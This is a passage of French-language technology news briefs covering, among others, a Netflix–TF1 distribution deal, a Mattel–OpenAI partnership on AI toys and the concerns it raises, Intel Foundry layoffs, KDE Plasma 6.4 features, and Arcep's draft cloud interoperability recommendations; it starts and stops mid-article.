Cette incertitude teinte aussi l’offre « souveraine » d’AWS. Et, contrairement à Microsoft, l’entreprise ne propose pas de variante hybride « sur site », qui aurait pu donner naissance à une structure de type Bleu ou S3ns. Pour ces dernières, rien ne s’oppose a priori à la qualification SecNumCloud de l’ANSSI par exemple, qui garantie l’immunité face aux législations extraterritoriales notamment. Dans toutes ses offres, AWS reste en position de contrôle. Mais cette approche a un certain avantage pour la clientèle intéressée : l’offre européenne aura les mêmes fonctions que dans le reste du monde, avec l’intégralité des portefeuilles de services, y compris tout ce qui touche à l’intelligence artificielle.

La multiplication et le renforcement de ces offres en provenance des hyperscalers américains témoignent quoi qu’il en soit d’une adaptation aux inquiétudes européennes. Les géants de la tech restent cependant soumis aux législations de leur pays d’origine et aux soubresauts de la politique mondiale. Les relations entre l’Union européenne et les États-Unis sont tendues, le gouvernement Trump ayant dans son collimateur des règlements tels que le DMA et le DSA. La Maison-Blanche a fait savoir que ses grandes entreprises ne devraient obéir qu’à des lois américaines.

  •  

Netflix distribuera les contenus de TF1 à partir de 2026

Un clou de plus dans le cercueil de la TNT ?
Netflix distribuera les contenus de TF1 à partir de 2026

Pour la première fois, Netflix se prépare à ouvrir les portes de son service à un autre opérateur : le géant américain du streaming annonce en effet qu’il distribuera, à compter de l’été 2026, les contenus et le direct de la chaîne TF1.

La traditionnelle poignée de mains qui accompagne le communiqué de presse laisse entendre que l’accord a été finalisé au bord de la Méditerranée, à l’occasion du festival de Cannes. Son ampleur laisse cependant augurer des centaines d’heures de travail préalables, des deux côtés de l’Atlantique. Netflix et TF1 viennent en effet d’annoncer un accord de distribution conjoint, dont les termes apparaissent comme une première mondiale.

Tout TF1, directement dans l’interface de Netflix

« À partir de l’été 2026, tous les abonnés de Netflix en France pourront regarder les chaînes du Groupe TF1 et les contenus à la demande de TF1+, directement sur Netflix », indique le géant américain, qui a récemment augmenté ses tarifs en France. Selon les termes de ce partenariat, les abonnés Netflix se verront donc proposer les émissions et programmes de TF1, en direct ou à la demande, au sein de l’interface de recommandation de contenus.

Les deux partenaires précisent que l’accord couvre aussi bien les émissions de divertissement populaires comme Koh Lanta ou The Voice que la diffusion des rencontres sportives dont TF1 a acquis les droits.

« Ce nouveau partenariat offrira au public français une toute nouvelle manière de profiter des programmes de TF1, et offrira aux abonnés Netflix en France encore plus de variété et de choix », résument les deux entreprises, qui collaboraient déjà sur la production de certaines fictions ou séries.

« Alors que les habitudes de visionnage évoluent vers le visionnage à la demande et que la fragmentation des audiences s’accentue, cette alliance sans précédent permettra à nos programmes de qualité et populaires d’atteindre des audiences inégalées et d’ouvrir de nouveaux horizons publicitaires, dans un environnement qui s’articule parfaitement avec notre plateforme TF1+ », commente dans un communiqué Rodolphe Belmer.

Une approche complémentaire de TF1+

Le PDG du groupe TF1 répond ainsi de façon implicite à une question qui ne manque pas de se poser : la chaîne ne se tire-t-elle pas une balle dans le pied en s’alliant avec un concurrent ? Depuis son lancement début 2024, la chaîne mise en effet massivement sur le développement de TF1+, sa plateforme de vidéo à la demande.

Interrogé en janvier par le Monde, il revendiquait « 33 millions de spectateurs mensuels, qui consomment en moyenne plus de cinq heures par mois », et présentait TF1+ non pas comme une simple TV de rattrapage (catch-up TV), mais comme une véritable plateforme de streaming, pensée pour aller concurrencer les poids lourds du secteur, notamment américains.

« Nous sommes passés de 15 000 heures de programmes disponibles au lancement à 25 000 heures aujourd’hui, soit autant qu’Amazon et plus que Disney+ et MyCanal. On vise de 30 000 à 35 000 heures d’ici à la fin de l’année », déclarait-il encore. Interrogé mercredi par l’AFP, il réaffirme que le groupe ne redoute pas de cannibalisation des audiences de sa propre plateforme, et table sur le fait que l’opération « sera nettement positive pour nous en termes d’audience ».

Vers un Netflix agrégateur de contenus ?

Hier concurrents, demain alliés. Si Netflix et ses concurrents nouent régulièrement des partenariats avec des chaînes de TV pour acquérir des droits de distribution spécifiques, c’est la première fois qu’un contrat est négocié à une telle échelle, en intégrant les principaux produits phare de la chaîne de TV concernée – et scellant au passage un clou supplémentaire dans la distribution hertzienne des flux.

« Cet accord ouvre la porte à davantage de contrats entre Netflix et les groupes de télévision traditionnels, qui sont aux prises avec la baisse de leurs audiences et de leurs revenus publicitaires, alors que de plus en plus de personnes regardent la télévision en ligne ou via des services de streaming », estime le Financial Times.

Netflix se garde bien de confirmer qu’une brèche est désormais ouverte, mais se dit ravi de cette ouverture à de nouveaux contenus, obtenus auprès d’un partenaire dont les audiences sont nettement supérieures aux siennes. Le service américain ne communique plus ses chiffres pour la France, mais il faisait état de 10 millions d’abonnés en 2022, là où TF1 revendique 33 millions de spectateurs mensuels en ligne.

  •  

☕️ Windows 11 et iOS 26 vont se doter d’une économie d’énergie adaptative

Deux systèmes d’exploitation, aux antipodes l’un de l’autre, développent actuellement le même type de fonctionnalité : l’économie d’énergie adaptative. Elle doit permettre de mieux contrôler la consommation d’énergie en fonction du contexte.

L’idée est de faire entrer un plus grand nombre de paramètres dans le calcul. Sur Windows 11, la fonction a été découverte par fantomofearth, à qui l’on doit déjà d’autres trouvailles. La fonction, pour l’instant inactive, se servira du contexte pour mieux adapter la consommation. Ce que fait l’utilisateur, le niveau actuel de charge, l’utilisation des ressources et d’autres paramètres seront utilisés pour ajuster le remplissage de la batterie. L’arrivée de la fonction a été confirmée par le responsable Brandon LeBlanc de chez Microsoft.

Du côté d’iOS 26 (et d’iPadOS 26), pour l’instant disponible uniquement sous forme d’une première bêta pour les développeurs, on trouve d’abord un tableau de bord plus complet sur l’usage de la batterie, comme pointé par iGen notamment.

On y trouve une nouvelle option, « Adaptive Power », désactivée par défaut. Elle se propose de faire « de petits ajustements », comme diminuer légèrement la luminosité de l’appareil ou permettre à certaines tâches de s’exécuter un peu moins vite. La fonction ne remplace pas le mode Économie d’énergie, qui s’activera toujours automatiquement à 20 % de charge restante. D’ailleurs, iOS 26 saura enfin fournir une durée indicative restante jusqu’à la charge complète.

Dans les deux cas, la fonction viendra compléter la recharge adaptative que l’on connait déjà, quand les appareils apprennent des habitudes de leurs utilisateurs, pour bloquer la recharge à 80 %, et ne débloquer les 20 % restants que peu avant l’utilisation. L’objectif est de limiter le temps passé avec une batterie à 100 % et en charge, source de stress pour les batteries lithium-ion.

  •  

Mattel noue un partenariat avec OpenAI pour de l’IA dans les jouets pour enfants

Math class is tough!
Mattel noue un partenariat avec OpenAI pour de l’IA dans les jouets pour enfants

Mattel et OpenAI ont annoncé la signature d’un partenariat stratégique, qui permettra au géant du jouet de s’appuyer sur les produits d’IA de la famille de ChatGPT pour son fonctionnement interne, mais aussi et surtout pour concevoir de nouveaux « produits et expériences ». L’introduction possible de briques d’IA génératives dans des jouets et jeux destinés aux enfants suscite déjà des inquiétudes.

Revenue sous les feux de la rampe depuis la sortie du film Barbie, la poupée éponyme sera-t-elle bientôt capable de dialoguer avec les enfants ? Le scénario reste pour l’instant très hypothétique, mais le géant du jouet Mattel a ouvert une porte à l’intelligence artificielle générative en annonçant, le 12 juin dernier, la signature d’une « collaboration stratégique » avec OpenAI, l’éditeur de ChatGPT.

Une collaboration aux débouchés encore flous

La nouvelle n’est pas anodine : c’est a priori la première fois qu’un éditeur d’intelligence artificielle noue un contrat à grande échelle avec un acteur du monde du jouet, en sachant que parmi ces derniers, Mattel fait figure de poids lourd.

Le groupe américain, qui a pesé 5,38 milliards de dollars de chiffre d’affaires en 2024, est un incontournable des rayons de la grande distribution, avec Barbie bien sûr, mais aussi Hot Wheels, Polly Pocket ou Fisher Price, mais aussi Scrabble, UNO ou Pictionary, sans oublier des dizaines d’autres licences.

L’un des volets de cet accord prévoit que Mattel, qui compte 34 000 employés dans le monde, intègre les outils d’OpenAI tels que ChatGPT Enterprise à ses activités internes, pour « améliorer le développement de produits et l’idéation créative, stimuler l’innovation et approfondir l’engagement avec son public ».

Si ce premier point semble relativement intelligible, la « collaboration » prévoit un second pan nettement plus flou :

« Cet accord allie l’expertise respective de Mattel et d’OpenAI pour concevoir, développer et lancer des expériences innovantes pour les fans du monde entier. Grâce à la technologie d’OpenAI, Mattel apportera la magie de l’IA à des expériences de jeu adaptées à chaque âge, en mettant l’accent sur l’innovation, la confidentialité et la sécurité ».

Les deux partenaires évoquent bien l’intégration de briques d’IA dans des jeux ou jouets, mais ne précisent en rien les produits concernés ou les fonctionnalités envisagées. L’omission n’est pas forcément problématique : après tout, si les deux entreprises débutent tout juste leur partenariat, il semble logique qu’elles n’aient pas encore abouti à des propositions.

Des commentateurs déjà inquiets

Tous n’accordent pas à Mattel et OpenAI le bénéfice du doute. Le think tank Public Citizen, basé à Washington et spécialisé dans le lobbying en faveur de la défense des consommateurs, a par exemple tiré la sonnette d’alarme sans attendre les premiers jouets dopés à l’IA.

« Mattel ne devrait pas abuser de la confiance que lui accordent les parents pour mener une expérience sociale imprudente sur nos enfants en vendant des jouets intégrant l’IA », clame son coprésident, Robert Weissman. Selon lui, le fait d’engager les enfants dans des interactions vocales imitant la voix humaine de façon réaliste soulève un véritable risque. « Cela peut nuire au développement social, interférer avec la capacité des enfants à nouer des relations, les éloigner des moments de jeu avec leurs pairs et éventuellement leur infliger des dommages à long terme ».

« Je veux bien donner gratuitement un slogan accrocheur à cette idée de jouets IA : « arrêtez de penser avant même d’avoir commencé » », ironise de son côté l’essayiste Rebecca Solnit.

En dépit de leurs engagements en matière de confidentialité et de sécurité, les deux entreprises sont a priori conscientes que le sujet risque de susciter la controverse. Une source proche indique par ailleurs à Axios que le premier produit issu de cette collaboration sera positionné sur la tranche des 13 ans et plus, précisément pour limiter les critiques et les contraintes réglementaires, souvent plus strictes sur les jeunes publics.

En attendant d’en savoir plus sur les fruits de cette collaboration, reste donc une équation dont les paramètres mêlent enjeux économiques et considérations sociales, voire sociétales. D’un côté, les premiers jeux et jouets IA sont susceptibles de bénéficier d’une traction commerciale particulièrement forte, du fait de la nouveauté et de promesses inédites en matière d’interactions, de divertissement ou pourquoi pas d’apprentissages. Ce qui explique sans doute pourquoi OpenAI et Mattel souhaitent se positionner dès à présent comme les précurseurs de ce nouveau marché.

De l’autre, on retrouve bien sûr les innombrables zones d’ombre et sources d’inquiétude liées à l’IA générative – hallucinations, biais des modèles de langage, exploitation de données personnelles, etc. – catalysées par la fragilité du public visé.

« Je ne veux pas publier dans un an des articles sur la façon dont une voiture Hot Wheels a encouragé l’automutilation ou sur les relations amoureuses prolongées entre des enfants et leurs Barbie IA. C’est prévisible et, je l’espère, évitable. Mais c’est assurément la direction vers laquelle nous allons si nous ne prenons pas les précautions nécessaires avec ces produits », s’inquiète Adam Dodge, cofondateur de l’association EndTAB (Ending Technology-Enabled Abuse).

Fin avril, une équipe conjointe de chercheurs de Stanford et de l’association de protection de l’enfance Common Sense Media ont partagé un rapport d’évaluation des risques liés à l’utilisation de chatbots basés sur l’IA générative par les jeunes publics. Dans le sillage de révélations liées par exemple aux dérives permises par des outils comme Character.ai, ils y préconisent que ces agents conversationnels ne soient pas utilisés par les moins de 18 ans.

  •  

12 ans qu’AMD règne sur Xbox (et PlayStation), ce n’est pas près de s’arrêter

Comme quoi, les performances pures ne font pas tout
12 ans qu’AMD règne sur Xbox (et PlayStation), ce n’est pas près de s’arrêter

Pour la prochaine génération de consoles Xbox, Microsoft exploitera de nouveau des puces AMD. Sony devrait faire de même avec la prochaine PlayStation. Si initialement AMD n’était pas présent sur les consoles des deux fabricants, le Texan a fait son trou depuis plus de dix ans. Nintendo a de son côté fait le contraire, en passant des GPU AMD à ceux de NVIDIA.

Microsoft rempile avec AMD pour ses consoles…

Sarah Bond, présidente de la branche Xbox de Microsoft depuis près de deux ans, vient d’annoncer un « partenariat stratégique pluriannuel avec AMD » afin de « co-concevoir des puces silicium sur un portefeuille d’appareils, notamment la prochaine génération de consoles Xbox ». Pour le nom, les détails et la date de lancement, on repassera.

Elle ajoute que vous pourrez les utiliser dans « votre salon » et « dans vos mains », en rapport avec les consoles portables. Pour rappel, Microsoft vient de lancer la première du genre, en partenariat avec Asus : la ROG Ally.

Elle exploite un SoC AMD Ryzen Z2 A comprenant une partie CPU Zen 2 et une partie GPU RDNA 2. AMD propose des architectures bien plus récentes dans sa série de Ryzen Z2. La puce Z2 Extreme – et la version « AI » avec un NPU de 50 TOPS – exploite des cœurs Zen 5 et RDNA 3.5.

… mais aussi avec les équipes Windows

On vous épargne les promesses d’effets « whaouu » sur la partie graphique et immersion, pour sauter directement au dernier buzz word du moment : « des expériences de jeu améliorées par la puissance de l’intelligence artificielle ».

Sarah Bond ajoute que l’expérience de jeu ne sera pas liée à une seule boutique ou un appareil : « c’est pourquoi nous travaillons en étroite collaboration avec l’équipe Windows pour garantir que Windows soit la plateforme numéro un pour jouer ». Garder une uniformité sur les parties matérielle et logicielle permet aussi probablement de simplifier la rétrocompatibilité, un argument également mis en avant par Microsoft.

Xbox et PlayStation : AMD règne en maitre depuis plus de 10 ans

Nous avons décidé de regarder un peu dans le rétro ce qu’il en était des puces dans les consoles des trois principaux fabricants actuels que sont Microsoft, Nintendo et Sony.

Chez Microsoft, la première Xbox exploitait un CPU Intel et un GPU NVIDIA, mais les choses ont changé dès la seconde génération. AMD s’est en effet rapidement imposé sur la partie graphique… du moins ATI à l’époque. La console a été lancée en 2005 et AMD a racheté ATI en 2006.

À partir de 2013 avec la Xbox One, AMD est aussi aux commandes de la partie CPU. Cela fait donc 12 ans qu’AMD règne en maitre dans les consoles Xbox, et cela va visiblement encore continuer longtemps avec l’annonce du jour. Chez Sony, c’est la même chose puisque AMD est arrivé à partir de la PlayStation 4, en 2013.

Nintendo, enfin, a complétement changé de crémerie entre les Wii et les Switch. Adieu le couple IBM-AMD, bonjour le SoC NVIDIA (CPU et GPU).

  • Xbox Series X/S : CPU AMD (Zen 2) et GPU AMD (RDNA 2)
  • Xbox One : CPU AMD (Jaguar) et GPU AMD (GCN)
  • Xbox 360 : CPU IBM PowerPC et GPU ATI Xenos
  • Xbox : CPU Intel Pentium III et GPU NVIDIA GeForce 3
  • ROG Xbox Ally : CPU AMD (Zen 2) et GPU AMD (RDNA 2)
  • PlayStation 5 : CPU AMD (Zen 2) et GPU AMD (RDNA 2)
  • PlayStation 4 : CPU AMD (Jaguar) et GPU AMD (GCN)
  • PlayStation 3 : CPU STI (Sony, Toshiba et IBM) et GPU Reality Synthesizer
  • PlayStation 2 : CPU Sony (Emotion Engine) et GPU Graphics Synthesizer
  • PlayStation (ou PS One) : CPU Sony R3000 (RISC) et GPU Sony
  • Switch 2 : CPU NVIDIA (Tegra) et GPU NVIDIA (Ampere)
  • Switch : CPU NVIDIA (Tegra) et GPU NVIDIA (Maxwell)
  • Wii U : CPU IBM (PowerPC) et GPU AMD (Radeon HD)
  • Wii : CPU IBM (PowerPC) et GPU ATI (Hollywood)

La prochaine génération de consoles Microsoft utilisera donc un SoC AMD, mais cela devrait aussi être le cas chez Sony. Le fabricant a récemment confirmé travailler sur la prochaine génération, sans plus de détails. Les deux ne sont pas attendues avant 2027 ou 2028, selon les rumeurs.

Chez Sony, il serait question d’une PlayStation 6 (facile, mais une surprise peut arriver), tandis que les paris sont ouverts pour le nom de la prochaine Xbox…

  •  

☕️ Les influenceurs et l’IA jouent un rôle croissant dans l’accès à l’information

Un cinquième des personnes interrogées aux États-Unis suivent l’information via le podcasteur Joe Rogan, 22 % des moins de 35 ans s’informent en France via les productions YouTube et TikTok d’Hugo Décrypte… Selon le dernier rapport sur l’information numérique du Reuters Institute, le paysage médiatique change nettement à la faveur des créateurs de contenus, partout dans le monde.

L’accès à l’information via les réseaux sociaux se fragmente par ailleurs dans le monde. Facebook et YouTube sont utilisés respectivement chaque semaine pour s’informer par 36 % et 30 % des plus de 96 000 personnes interrogées, tandis qu’Instagram et WhatsApp sont utilisés par près d’une personne sur cinq pour ce type d’usage, TikTok par 16 % d’entre elles, X par 12 %.

X reste d’ailleurs utilisé de manière relativement stable pour accéder à de l’information, en particulier par de jeunes hommes et des personnes penchant à droite de l’échiquier politique. Les audiences se déclarant plus progressistes affirmant de leur côté avoir quitté la plateforme ou l’utiliser moins.

Malgré ces transformations, le rôle des influenceurs et des personnalités numériques dans la diffusion de désinformation est perçu comme premier facteur de risque par 47 % des répondants, à égalité avec les politiciens.

Le Reuters Institute relève aussi que si seulement 7 % déclarent utiliser l’IA pour accéder à de l’information, la proportion grimpe à 15 % chez les moins de 25 ans.

Ceci, sachant que le public est divisé sur le rôle de l’IA dans l’information : ces technologies sont perçues comme permettant de produire des actualités pour moins cher, avec le risque de rendre l’information moins transparente, moins juste, et globalement moins digne de confiance.

  •  

Intel va licencier de 15 à 20 % de ses employés d’Intel Foundry

Emplois fondus
Intel va licencier de 15 à 20 % de ses employés d’Intel Foundry

Le VP des opérations d’Intel a annoncé aux employés la réduction de 15 à 20 % des emplois d’usine de l’entreprise.

Nouvelle coupe claire chez Intel. L’entreprise s’apprête à licencier près d’un employé d’usine sur cinq, d’après un mail envoyé par son vice-président des opérations Naga Chandrasekaran obtenu par The Oregonian.

« Ces actions sont difficiles, mais essentielles pour relever les défis posés par la situation financière actuelle de l’entreprise », y écrit le dirigeant. « Réduire la complexité organisationnelle et autonomiser nos ingénieurs permettra de mieux répondre aux besoins de nos clients », indique la société à The Oregonian, en précisant que 15 à 20 % des emplois d’Intel Foundry seraient concernés. Le gros des licenciements devrait avoir lieu en juillet.

Difficultés à la chaîne

Cette décision n’est qu’une pierre de plus dans la chaussure d’Intel, en difficultés évidentes depuis plusieurs années. Entre 2020 et 2023, touchée par une baisse régulière de ses ventes, le chiffre d’affaires annuel de la société chutait de 24 milliards de dollars pendant que ses effectifs augmentaient de 10 %.

Dépassée dans la course à l’intelligence artificielle – et des semi-conducteurs essentiels à son expansion –, l’entreprise licenciait déjà 15 000 personnes à l’été 2024. En bourse, la valeur de ses actions a baissé de 50 % sur le courant de l’année passée.

Outre la réorganisation stratégique annoncée dès septembre 2024, la société a par ailleurs vu son PDG Pat Gelsinger prendre sa retraite après plus de trente ans chez Intel et démissionner du conseil d’administration dans la foulée.

Nommé en mars, le nouveau PDG Lip-Bu Tan a souligné à plusieurs reprises vouloir rationaliser les activités d’Intel et accélérer le déploiement de nouvelles technologies. À ces fins, il a notamment indiqué vouloir réduire les dépenses opérationnelles d’un milliard de dollars par an et chercher à recruter davantage d’ingénieurs de pointe.

15 à 20 % des effectifs d’Intel Foundry

Fin 2024, la société comptait 109 000 salariés, sans que la proportion affectée à Intel Foundry, directement visée par l’annonce de Naga Chandrasekaran, ne soit connue.

Ce département réunit en tout cas des emplois variés, allant du technicien d’usine aux chercheurs spécialisés dans la mise au point de nouvelles générations de microprocesseurs. D’après The Oregonian, les licenciements pourraient toucher jusqu’à plus de 10 000 personnes à travers la planète.

Les réductions d’effectifs doivent être décidées « sur une combinaison de changements de portefeuille, d’élimination de niveaux et de postes, d’évaluation des compétences pour les postes restants et de décisions difficiles concernant nos projets d’investissements », selon Naga Chandrasekaran. L’impact sur les opérations en usine sera aussi pris en compte.

Fin 2024, dans le cadre du CHIPS Act états-unien, l’entreprise obtenait des subventions plus réduites que prévu (7,9 milliards de dollars tout de même) de l’administration Biden. Celles-ci étaient soumises à plusieurs conditions, dont le maintien de 50,1 % des droits de propriété et/ou de vote sur Intel Foundry, transformée en filiale quelques mois plus tôt.

  •  

KDE Plasma 6.4 apporte un déluge de nouveautés

KDE Plasma 6.4 apporte un déluge de nouveautés

C’est peu dire que la nouvelle version de Plasma apporte du neuf. Il s’agit probablement de l’une des versions les plus riches en améliorations, dans presque tous les domaines.

La nouvelle version de l’environnement de bureau Plasma apporte une multitude de nouveautés. La plus importante est sa nouvelle gestion étendue des fenêtres, plus souple. Elle permet notamment de définir une disposition spécifique pour chaque écran virtuel. Par exemple, deux applications occupant chacune la moitié de l’écran sur un premier bureau, et d’autres applications en mosaïque sur un autre.

On trouve une myriade d’autres améliorations. Par exemple, le thème Breeze a été légèrement assombri pour améliorer le contraste et la lisibilité. En outre, quand une boite de dialogue apparait pour demander le mot de passe, le reste de l’écran s’assombrit pour mieux isoler la fenêtre et refléter son importance. Plasma 6.4 ajoute aussi une petite option sympathique : quand on fait glisser-déposer un fichier au sein du même disque dans le gestionnaire, une case permet d’indiquer que l’on souhaite déplacer par défaut les données, plutôt que de choisir à chaque fois ce que l’on veut faire.

Ne pas déranger !

Dans les Paramètres de Plasma, tout ce qui touche aux animations et effets visuels a été réuni dans une même section. Les fenêtres de transferts de fichiers présentent désormais un graphique de l’évolution de la vitesse de transfert.

On note d’autres ajouts pratiques, comme une notification quand on essaye de parler dans un micro coupé, la possibilité de lancer l’installation des mises à jour depuis la notification qui les signale, le passage automatique en mode « Ne pas déranger » quand on utilise une application en plein écran (jeu, vidéo…), ou encore l’affichage d’une balise verte « Nouveau » à côté des applications nouvellement installées dans le lanceur d’applications.

Le lanceur KRunner sait en outre gérer les couleurs. Entrer une valeur hexadécimale affichera un aperçu de la teinte, avec la possibilité d’afficher son code dans d’autres formats. Spectacles, l’outil de capture d’écran, fait un grand bond. Appuyer sur la touche Imprim écran lance maintenant le mode sélection, qui permet de délimiter la zone à capturer ou de basculer en plein écran. Les enregistrements d’écran, au format WebM, sont annoncés comme était de bien meilleure qualité.

Du Bluetooth, du HDR, des stylets…

Vous pensez que c’est fini ? Loin de là, avec par exemple un widget Bluetooth plus efficace, qui doit mieux reconnaitre les appareils et faciliter l’appairage. Le HDR, qui fait actuellement l’objet d’améliorations multiples dans les distributions, dispose d’un nouvel outil de calibrage dans les paramètres d’affichage. Toujours pour le HDR, Plasma 6.4 apporte le support d’Extended Dynamic Range et du format vidéo P010, ce qui devrait améliorer l’efficacité énergétique avec les contenus HDR.

Ce n’est toujours pas terminé, puisque les artistes peuvent paramétrer plus facilement leur stylet dans les réglages de Plasma. La nouvelle interface permet de modifier le comportement des boutons de manière « beaucoup plus intuitive », selon l’équipe de Plasma. L’intégration du navigateur permet de son côté de choisir les versions Flatpak de variantes de Firefox et Chromium comme LibreWolf et Ungoogled Chromium.

Enfin, sur un plan plus technique, on note plusieurs évolutions. Par exemple, pour les processeurs AMD et Intel intégrant une partie graphique (IGP), le Moniteur Système peut afficher désormais le taux d’occupation GPU par processus. Une nouvelle section Capteurs peut aussi afficher les données brutes issues des capteurs matériels. Le moniteur d’espace, lui, vérifie maintenant l’espace libre sur toutes les partitions sans cache de tous les disques, et plus uniquement celui de Root et Home. Quant au support de Wayland, il s’étend à de nouveaux protocoles, dont FIFO et single pixel buffer.

Comme d’habitude, pour profiter de ces nouveautés, il faudra attendre que Plasma 6.4 soit répercuté sur la distribution que vous utilisez. Selon les cas, cela peut aller d’une disponibilité immédiate à l’attente de la prochaine version majeure du système.

  •  

Comment l’Arcep veut renforcer la portabilité et l’interopérabilité dans le cloud

Nuage magique
Comment l’Arcep veut renforcer la portabilité et l’interopérabilité dans le cloud

Le gendarme des télécoms vient de mettre en ligne son projet de recommandation sur l’interopérabilité et la portabilité des services cloud. Il s’agit de définir les « bonnes pratiques » pour faciliter le changement de fournisseurs.

La loi SREN (Sécuriser et réguler l’espace numérique), promulguée en avril 2024, confie deux nouvelles missions à l’Arcep, le régulateur des télécoms : « la régulation des services cloud et la régulation des intermédiaires de données ». L’Autorité explique que sa mission est notamment « de préciser les règles et les modalités de mise en œuvre des exigences essentielles d’interopérabilité, de portabilité et d’ouverture des API » pour les services de cloud.

Après avoir lancé une consultation publique fin 2024, l’Arcep s’appuie sur la vingtaine de retours pour avancer dans ces travaux. Elle vient de passer une nouvelle étape avec la présentation de son projet de recommandation relative à « l’interopérabilité et à la portabilité des services d’informatique en nuage ». Il est soumis à consultation jusqu’au 18 juillet 2025 à 18 h.

Des données et informations dans un « format lisible par ordinateur »

Premier point, qui ne surprendra personne : « les acteurs ont majoritairement reconnu l’intérêt de rendre disponibles des informations comparables ». Certains mettent néanmoins en garde contre « une harmonisation trop stricte du format de diffusion de ces informations, susceptible de générer des lourdeurs excessives en particulier pour des fournisseurs de petite taille ». Se dirige-t-on vers la concrétisation d’un espoir que nous soulevions il y a déjà cinq ans : une fiche d’information standardisée du cloud ? À l’instar de ce qui existe pour les forfaits mobiles ou les banques, cela permet de facilement comparer les offres.

Justement, « afin de faciliter la comparaison entre les services cloud », l’Arcep dresse la liste des informations que les hébergeurs doivent transmettre et le format à utiliser, avec « un ordonnancement uniforme ». L’Autorité propose ainsi que les principales informations soient à la fois disponibles dans un format libre (page web, PDF…), et dans un « format lisible par ordinateur (JSON par exemple) ».

Concernant les informations à proposer aux clients, l’Arcep propose la liste suivante :

  • données (brutes ou dérivées) et actifs numériques ;
  • procédures pour initier une migration depuis et vers le service cloud ;
  • méthodes de migration disponibles (upload, API, expédition de disques) et recommandées en fonction du volume, avec les protections (chiffrement), restrictions et limitations connues ;
  • comment garantir la sécurité des données lors du transfert (authentification, confidentialité…) ;
  • procédures pour tester la migration ;
  • processus pour garantir l’intégrité des données et la continuité de service pendant la migration ;
  • processus de résiliation après une migration ;
  • outils de supervision disponibles et coûts associés ;
  • formats disponibles, recommandés ou utilisés et documentation associée (migration et multi-cloud) ;
  • documentation des API pour la portabilité et l’interopérabilité ;
  • description des dépendances nécessaires à l’export des données ;
  • délais de migration et durée de transfert des données.

L’Arcep demande aux acteurs du marché si les informations proposées couvrent « les besoins des clients pour comprendre les modalités de portabilité et d’interopérabilité d’un service cloud ». Le cas échéant, de lister les éléments de la liste à modifier.

Une bonne pratique à mettre en place : OpenAPI

Le règlement sur les données prévoit aussi que les fournisseurs de cloud proposent « des interfaces ouvertes à disposition de leurs clients » pour faciliter le changement de fournisseur et l’interopérabilité. « Ces interfaces permettent de garantir que les informations utilisées entre deux systèmes cloud sont renseignées selon des formats interprétables, à l’aide de protocoles partagés et que les systèmes soient interconnectés par des réseaux pour pouvoir les échanger », rappelle le régulateur.

Sans surprise, les retours de l’année dernière reconnaissaient unanimement l’intérêt d’avoir des « API disponibles, stables et documentées ». Certains en ont profité pour glisser à l’oreille de l’Arcep la spécification OpenAPI, qui repose sur des « standards et des spécifications de l’Internet Engineering Task Force (IETF) ».

Pour l’Arcep, c’est une « une bonne pratique » à promouvoir. Elle demande donc aux fournisseurs d’adopter « la version la plus récente de la spécification OpenAPI pour la description et la documentation de leurs API ». Dans son projet de recommandation, l’Autorité demande aux fournisseurs si l’adoption généralisée de la spécification OpenAPI est souhaitable.

Prévenir un an en avance les mises à jour qui cassent la rétrocompatibilité

Sur les API toujours, des retours revenaient sur un point important : les mises à jour « soudaines et trop fréquentes de certaines API clés », surtout lorsqu’elles cassent la rétrocompatibilité. La conséquence ? Cela peut « limiter la capacité des fournisseurs tiers à garantir la compatibilité de leurs services, et in fine leur interopérabilité ».

Les contributeurs proposaient des délais de préavis de trois et douze mois en cas de mises à jour non rétrocompatibles. L’Arcep part sur le délai le plus long et demandent aux fournisseurs d’informer leurs clients « par l’intermédiaire de message d’avertissement douze mois au minimum » avant la mise en place d’une mise à jour non rétrocompatible. L’Autorité attend des retours sur ce point.

Une fois la consultation publique terminée, l’Arcep décidera de ses recommandations finales et publiera (dans un souci de transparence) les retours qu’elle aura reçus, « à l’exclusion des éléments d’information couverts par le secret des affaires ».

Il ne s’agit dans tous les cas que de recommandations, comme l’Autorité le reconnait elle-même : « plutôt que d’adopter des règles contraignantes qui ne s’appliqueraient que pour une durée limitée, en raison de l’entrée en application prochaine du règlement sur les données, et uniquement aux fournisseurs de services cloud établis en France, l’Arcep estime plus approprié de définir des bonnes pratiques à destination de l’ensemble des fournisseurs de services cloud ».

  •  

☕️ Le DG d’Amazon prévoit des licenciements en réaction à l’« efficacité » de l’IA

Le directeur général d’Amazon Andy Jassy a déclaré que les progrès de l’intelligence artificielle permettraient à l’entreprise de réduire ses effectifs dans les prochaines années.

« Le déploiement de l’IA générative et des agents devrait modifier la façon dont nous travaillons, écrit-il dans une note envoyée aux employés de l’entreprise. Nous aurons besoin de moins de personnes pour effectuer certaines des tâches actuelles, et de plus de personnes pour effectuer d’autres types de tâches. »

Le dirigeant souligne qu’Amazon construit ou a déjà déployé plus de 1 000 services d’IA générative, une « petite fraction » de ce que l’entreprise prévoit de lancer à terme.

Depuis 2022, l’entreprise a licencié 27 000 personnes dans divers services. Andy Jassy ne donne pas d’échéance précise dans ce cas-ci, mais il prévient que le nouveau solde devrait se révéler négatif.

« Il est difficile de savoir exactement où cela nous mènera au fil du temps, mais dans les prochaines années, nous prévoyons que notre effectif total se réduira à mesure que nous réaliserons des gains d’efficacité grâce à l’utilisation intensive de l’IA dans toute l’entreprise ».

Ses propos rejoignent ceux d’autres dirigeants d’entreprises dans les derniers mois, dont ceux du patron de Shopify ou de celui de Duolingo.

  •  

La haine se répand sur Instagram et Facebook depuis le changement de la modération

Meta-stase
La haine se répand sur Instagram et Facebook depuis le changement de la modération

Dans une enquête auprès de 7 000 personnes, trois associations constatent l’augmentation des discours de haine sur les réseaux de Meta. En parallèle, les internautes les plus à risque d’être visés expriment une peur croissante de s’exprimer sur ces réseaux sociaux.

Début janvier, Meta a modifié sa politique de modération sur Facebook, Instagram et Threads pour aller dans la droite ligne idéologique du nouveau président américain et de sa vision de la liberté d’expression. Ce faisant, l’entreprise a fait voler sa modération en éclat. En parallèle, les nouvelles conditions d’utilisation de Facebook permettent, par exemple, aux utilisateurs américains d’utiliser certaines insultes envers les femmes, les gays et les trans.

Six mois après, trois associations (UltraViolet, GLAAD et All Out) ont voulu constater les conséquences de ces changements. Elles ont interrogé environ 7 000 utilisatrices et utilisateurs actifs de 86 pays pour faire un bilan. Résultat [PDF], pour 72 % de ces personnes, les contenus problématiques ont augmenté (34 % augmenté, 38% augmenté significativement).

